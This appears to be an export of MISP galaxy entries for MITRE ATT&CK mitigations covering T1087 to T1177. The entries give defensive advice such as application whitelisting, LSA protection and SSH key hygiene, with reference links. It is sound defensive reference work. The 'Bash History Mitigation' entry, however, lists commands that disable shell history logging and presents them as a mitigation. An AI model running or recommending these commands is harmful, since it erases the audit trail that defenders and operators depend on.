The tag is: misp-galaxy:mitre-course-of-action="Account Discovery Mitigation - T1087"

Account Discovery Mitigation - T1087 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 6630. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1087

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding/WN12-CC-000077

Valid Accounts Mitigation - T1078

Take measures to detect or prevent techniques such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or installation of keyloggers to acquire credentials through [Input Capture](https://attack.mitre.org/techniques/T1056). Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems.

Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)

Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also check whether default accounts have been enabled, or whether new local accounts have been created without authorization.

Default usernames and passwords on applications and appliances should be changed immediately after installation and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet) Where possible, SSH keys used by applications should be rotated periodically and properly secured.

The tag is: misp-galaxy:mitre-course-of-action="Valid Accounts Mitigation - T1078"

Valid Accounts Mitigation - T1078 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 6631. Table References

Links

https://attack.mitre.org/mitigations/T1078

https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach

https://technet.microsoft.com/en-us/library/dn487450.aspx

https://technet.microsoft.com/en-us/library/dn535501.aspx

https://www.us-cert.gov/ncas/alerts/TA13-175A

Multilayer Encryption Mitigation - T1079

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Multilayer Encryption Mitigation - T1079"

Multilayer Encryption Mitigation - T1079 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Multilayer Encryption - T1079" with estimative-language:likelihood-probability="almost-certain"

Table 6632. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1079

Modify Registry Mitigation - T1112

Misconfiguration of permissions in the Registry may lead to opportunities for an adversary to execute code, like through [Service Registry Permissions Weakness](https://attack.mitre.org/techniques/T1058). Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Identify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Modify Registry Mitigation - T1112"

Modify Registry Mitigation - T1112 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 6633. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1112

https://technet.microsoft.com/en-us/library/ee791851.aspx

Authentication Package Mitigation - T1131

Windows 8.1, Windows Server 2012 R2, and later versions can run LSA as a Protected Process Light (PPL) by setting the Registry value <code>RunAsPPL</code> under <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa</code> to 1, which requires all DLLs loaded by LSA to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)

The tag is: misp-galaxy:mitre-course-of-action="Authentication Package Mitigation - T1131"

Authentication Package Mitigation - T1131 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Authentication Package - T1131" with estimative-language:likelihood-probability="almost-certain"

Table 6634. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/mitigations/T1131

https://technet.microsoft.com/en-us/library/dn408187.aspx

Screen Capture Mitigation - T1113

Blocking software based on screen capture functionality may be difficult, and there may be legitimate software that performs those actions. Instead, identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Screen Capture Mitigation - T1113"

Screen Capture Mitigation - T1113 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 6635. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1113

https://technet.microsoft.com/en-us/library/ee791851.aspx

Email Collection Mitigation - T1114

Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.

Use of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.

Identify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Email Collection Mitigation - T1114"

Email Collection Mitigation - T1114 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

Table 6636. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1114

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Input Prompt Mitigation - T1141

This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to mitigate. Use user training as a way to bring awareness and raise suspicion for potentially malicious events (ex: Office documents prompting for credentials).

The tag is: misp-galaxy:mitre-course-of-action="Input Prompt Mitigation - T1141"

Input Prompt Mitigation - T1141 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1141" with estimative-language:likelihood-probability="almost-certain"

Table 6637. Table References

Links

https://attack.mitre.org/mitigations/T1141

Clipboard Data Mitigation - T1115

Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Clipboard Data Mitigation - T1115"

Clipboard Data Mitigation - T1115 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 6638. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1115

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

LC_LOAD_DYLIB Addition Mitigation - T1161

Enforce that all binaries be signed by the correct Apple Developer IDs, and whitelist applications via known hashes. Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasn’t included as part of an update, it should be investigated.

The tag is: misp-galaxy:mitre-course-of-action="LC_LOAD_DYLIB Addition Mitigation - T1161"

LC_LOAD_DYLIB Addition Mitigation - T1161 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161" with estimative-language:likelihood-probability="almost-certain"

Table 6639. Table References

Links

https://attack.mitre.org/mitigations/T1161

Code Signing Mitigation - T1116

Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system. (Citation: NSA MS AppLocker) (Citation: TechNet Trusted Publishers) (Citation: Securelist Digital Certificates)

The tag is: misp-galaxy:mitre-course-of-action="Code Signing Mitigation - T1116"

Code Signing Mitigation - T1116 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Code Signing - T1116" with estimative-language:likelihood-probability="almost-certain"

Table 6640. Table References

Links

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1116

https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

https://technet.microsoft.com/en-us/library/cc733026.aspx

Automated Collection Mitigation - T1119

Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. A keylogger installed on a system may be able to intercept passwords through [Input Capture](https://attack.mitre.org/techniques/T1056) and be used to decrypt protected documents that an adversary may have collected. Strong passwords should be used to prevent offline cracking of encrypted documents through [Brute Force](https://attack.mitre.org/techniques/T1110) techniques.

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to collect files and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Automated Collection Mitigation - T1119"

Automated Collection Mitigation - T1119 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 6641. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1119

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Template Injection Mitigation - T1221

Consider disabling Microsoft Office macros/active content to prevent the execution of malicious payloads in documents (Citation: Microsoft Disable Macros), though this setting may not mitigate the [Forced Authentication](https://attack.mitre.org/techniques/T1187) use for this technique.

Because this technique involves user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations including training users to identify social engineering techniques and spearphishing emails. Network/Host intrusion prevention systems, antivirus, and detonation chambers can be employed to prevent documents from fetching and/or executing malicious payloads. (Citation: Anomali Template Injection MAR 2018)

The tag is: misp-galaxy:mitre-course-of-action="Template Injection Mitigation - T1221"

Table 6642. Table References

Links

https://attack.mitre.org/mitigations/T1221

https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104

https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6

Audio Capture Mitigation - T1123

Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.

Identify and block potentially malicious software that may be used to record audio by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Audio Capture Mitigation - T1123"

Audio Capture Mitigation - T1123 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 6643. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1123

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Encoding Mitigation - T1132

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Encoding Mitigation - T1132"

Data Encoding Mitigation - T1132 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"

Table 6644. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1132

Video Capture Mitigation - T1125

Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.

Identify and block potentially malicious software that may be used to capture video and images by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Video Capture Mitigation - T1125"

Video Capture Mitigation - T1125 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

Table 6645. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1125

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Login Item Mitigation - T1162

Restrict users from being able to create their own login items. Additionally, holding the shift key during login prevents apps from opening automatically (Citation: Re-Open windows on Mac).

The tag is: misp-galaxy:mitre-course-of-action="Login Item Mitigation - T1162"

Login Item Mitigation - T1162 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Login Item - T1162" with estimative-language:likelihood-probability="almost-certain"

Table 6646. Table References

Links

https://attack.mitre.org/mitigations/T1162

https://support.apple.com/en-us/HT204005

Domain Fronting Mitigation - T1172

If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be Domain Fronting.

In order to use domain fronting, attackers will likely need to deploy additional tools to compromised systems. (Citation: FireEye APT29 Domain Fronting With TOR March 2017) (Citation: Mandiant No Easy Breach) It may be possible to detect or prevent the installation of these tools with Host-based solutions.

The tag is: misp-galaxy:mitre-course-of-action="Domain Fronting Mitigation - T1172"

Domain Fronting Mitigation - T1172 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172" with estimative-language:likelihood-probability="almost-certain"

Table 6647. Table References

Links

http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016

https://attack.mitre.org/mitigations/T1172

https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

AppCert DLLs Mitigation - T1182

Identify and block potentially malicious software that may be executed through AppCert DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="AppCert DLLs Mitigation - T1182"

AppCert DLLs Mitigation - T1182 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1182" with estimative-language:likelihood-probability="almost-certain"

Table 6648. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1182

Spearphishing Link Mitigation - T1192

Because this technique involves user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails with malicious links. Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk. Other mitigations can take place as [User Execution](https://attack.mitre.org/techniques/T1204) occurs.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing Link Mitigation - T1192"

Spearphishing Link Mitigation - T1192 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192" with estimative-language:likelihood-probability="almost-certain"

Table 6649. Table References

Links

https://attack.mitre.org/mitigations/T1192

Hidden Window Mitigation - T1143

Whitelist programs that are allowed to have this plist tag. All other programs should be considered suspicious.

The tag is: misp-galaxy:mitre-course-of-action="Hidden Window Mitigation - T1143"

Hidden Window Mitigation - T1143 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hidden Window - T1143" with estimative-language:likelihood-probability="almost-certain"

Table 6650. Table References

Links

https://attack.mitre.org/mitigations/T1143

Create Account Mitigation - T1136

Use and enforce multifactor authentication. Follow guidelines to prevent or limit adversary access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to create privileged accounts within an environment.

Adversaries that create local accounts on systems may have limited access within a network if access levels are properly locked down. These accounts may only be needed for persistence on individual systems and their usefulness depends on the utility of the system they reside on.

Protect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.

The tag is: misp-galaxy:mitre-course-of-action="Create Account Mitigation - T1136"

Create Account Mitigation - T1136 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"

Table 6651. Table References

Links

https://attack.mitre.org/mitigations/T1136

Application Shimming Mitigation - T1138

There currently aren’t a lot of ways to mitigate application shimming. Disabling the Shim Engine isn’t recommended because Windows depends on shimming for interoperability and software may become unstable or not work. Microsoft released an optional patch update - KB3045645 - that will remove the "auto-elevate" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.

Changing UAC settings to "Always Notify" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.

The tag is: misp-galaxy:mitre-course-of-action="Application Shimming Mitigation - T1138"

Application Shimming Mitigation - T1138 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Application Shimming - T1138" with estimative-language:likelihood-probability="almost-certain"

Table 6652. Table References

Links

https://attack.mitre.org/mitigations/T1138

Spearphishing Attachment Mitigation - T1193

Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.

Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments in [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

Because this technique involves user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations. Users can be trained to identify social engineering techniques and spearphishing emails. To prevent the attachments from executing, application whitelisting can be used. Anti-virus can also automatically quarantine suspicious files.

The tag is: misp-galaxy:mitre-course-of-action="Spearphishing Attachment Mitigation - T1193"

Spearphishing Attachment Mitigation - T1193 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193" with estimative-language:likelihood-probability="almost-certain"

Table 6653. Table References

Links

https://attack.mitre.org/mitigations/T1193

Bash History Mitigation - T1139

There are multiple methods of preventing a user’s command history from being flushed to their .bash_history file, including use of the following commands: <code>set +o history</code> to stop logging (and <code>set -o history</code> to start logging again); <code>unset HISTFILE</code> added to a user’s .bashrc file; and <code>ln -s /dev/null ~/.bash_history</code> to write commands to <code>/dev/null</code> instead.

The tag is: misp-galaxy:mitre-course-of-action="Bash History Mitigation - T1139"

Bash History Mitigation - T1139 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Bash History - T1139" with estimative-language:likelihood-probability="almost-certain"

Table 6654. Table References

Links

https://attack.mitre.org/mitigations/T1139

Gatekeeper Bypass Mitigation - T1144

Other tools should be used to supplement Gatekeeper’s functionality. Additionally, system settings can prevent applications from running that haven’t been downloaded through the Apple Store which can help mitigate some of these issues.

The tag is: misp-galaxy:mitre-course-of-action="Gatekeeper Bypass Mitigation - T1144"

Gatekeeper Bypass Mitigation - T1144 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1144" with estimative-language:likelihood-probability="almost-certain"

Table 6655. Table References

Links

https://attack.mitre.org/mitigations/T1144

Private Keys Mitigation - T1145

Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-course-of-action="Private Keys Mitigation - T1145"

Private Keys Mitigation - T1145 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1145" with estimative-language:likelihood-probability="almost-certain"

Table 6656. Table References

Links

https://attack.mitre.org/mitigations/T1145

Hidden Users Mitigation - T1147

If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the <code>/Library/Preferences/com.apple.loginwindow</code> <code>Hide500Users</code> value will force all users to be visible.

The tag is: misp-galaxy:mitre-course-of-action="Hidden Users Mitigation - T1147"

Hidden Users Mitigation - T1147 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hidden Users - T1147" with estimative-language:likelihood-probability="almost-certain"

Table 6657. Table References

Links

https://attack.mitre.org/mitigations/T1147

SSH Hijacking Mitigation - T1184

Ensure SSH key pairs have strong passphrases and refrain from using key-store technologies such as ssh-agent unless they are properly protected. Ensure that all private keys are stored securely in locations that only the legitimate owner can access, are protected with strong passphrases, and are rotated frequently. Ensure proper file permissions are set and harden the system to prevent root privilege escalation opportunities. Do not allow remote access via SSH as root or other privileged accounts. Ensure that agent forwarding is disabled on systems that do not explicitly require this feature to prevent misuse. (Citation: Symantec SSH and ssh-agent)

The tag is: misp-galaxy:mitre-course-of-action="SSH Hijacking Mitigation - T1184"

SSH Hijacking Mitigation - T1184 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"

Table 6658. Table References

Links

https://attack.mitre.org/mitigations/T1184

https://www.symantec.com/connect/articles/ssh-and-ssh-agent

LC_MAIN Hijacking Mitigation - T1149

Enforce valid digital signatures for signed code on all applications and only trust applications with signatures from trusted parties.

The tag is: misp-galaxy:mitre-course-of-action="LC_MAIN Hijacking Mitigation - T1149"

LC_MAIN Hijacking Mitigation - T1149 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="LC_MAIN Hijacking - T1149" with estimative-language:likelihood-probability="almost-certain"

Table 6659. Table References

Links

https://attack.mitre.org/mitigations/T1149

Startup Items Mitigation - T1165

Since StartupItems are deprecated, preventing all users from writing to the <code>/Library/StartupItems</code> directory would prevent any startup items from getting registered. Similarly, appropriate permissions should be applied such that only specific users can edit the startup items so that they can’t be leveraged for privilege escalation.

The tag is: misp-galaxy:mitre-course-of-action="Startup Items Mitigation - T1165"

Startup Items Mitigation - T1165 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Startup Items - T1165" with estimative-language:likelihood-probability="almost-certain"

Table 6660. Table References

Links

https://attack.mitre.org/mitigations/T1165

Dylib Hijacking Mitigation - T1157

Prevent users from being able to write files to the search paths for applications, both in the folders where applications are run from and the standard dylib folders. If users can’t write to these directories, then they can’t intercept the search path.

The tag is: misp-galaxy:mitre-course-of-action="Dylib Hijacking Mitigation - T1157"

Dylib Hijacking Mitigation - T1157 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157" with estimative-language:likelihood-probability="almost-certain"

Table 6661. Table References

Links

https://attack.mitre.org/mitigations/T1157

Launch Agent Mitigation - T1159

Restrict users’ ability to create Launch Agents with group policy.

The tag is: misp-galaxy:mitre-course-of-action="Launch Agent Mitigation - T1159"

Launch Agent Mitigation - T1159 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Launch Agent - T1159" with estimative-language:likelihood-probability="almost-certain"

Table 6662. Table References

Links

https://attack.mitre.org/mitigations/T1159

Browser Extensions Mitigation - T1176

Only install browser extensions from trusted sources that can be verified. Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.

Browser extensions for some browsers can be controlled through Group Policy. Set a browser extension white or black list as appropriate for your security policy. (Citation: Technospot Chrome Extensions GP)

Change settings to prevent the browser from installing extensions without sufficient permissions.

Close out all browser sessions when finished using them.

The tag is: misp-galaxy:mitre-course-of-action="Browser Extensions Mitigation - T1176"

Browser Extensions Mitigation - T1176 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"

Table 6663. Table References

Links

http://www.technospot.net/blogs/block-chrome-extensions-using-google-chrome-group-policy-settings/

https://attack.mitre.org/mitigations/T1176

Process Doppelgänging Mitigation - T1186

This type of attack technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate process-loading mechanisms from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although Process Doppelgänging may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Doppelgänging Mitigation - T1186"

Process Doppelgänging Mitigation - T1186 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Process Doppelgänging - T1186" with estimative-language:likelihood-probability="almost-certain"

Table 6664. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://attack.mitre.org/mitigations/T1186

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

LSASS Driver Mitigation - T1177

On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code> to <code>dword:00000001</code>. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.

On Windows 10 and Server 2016, enable Windows Defender Credential Guard (Citation: Microsoft Enable Cred Guard April 2017) to run lsass.exe in an isolated virtualized environment without any device drivers. (Citation: Microsoft Credential Guard April 2017)

Ensure safe DLL search mode is enabled (<code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode</code>) to mitigate the risk that lsass.exe loads a malicious code library. (Citation: Microsoft DLL Security)
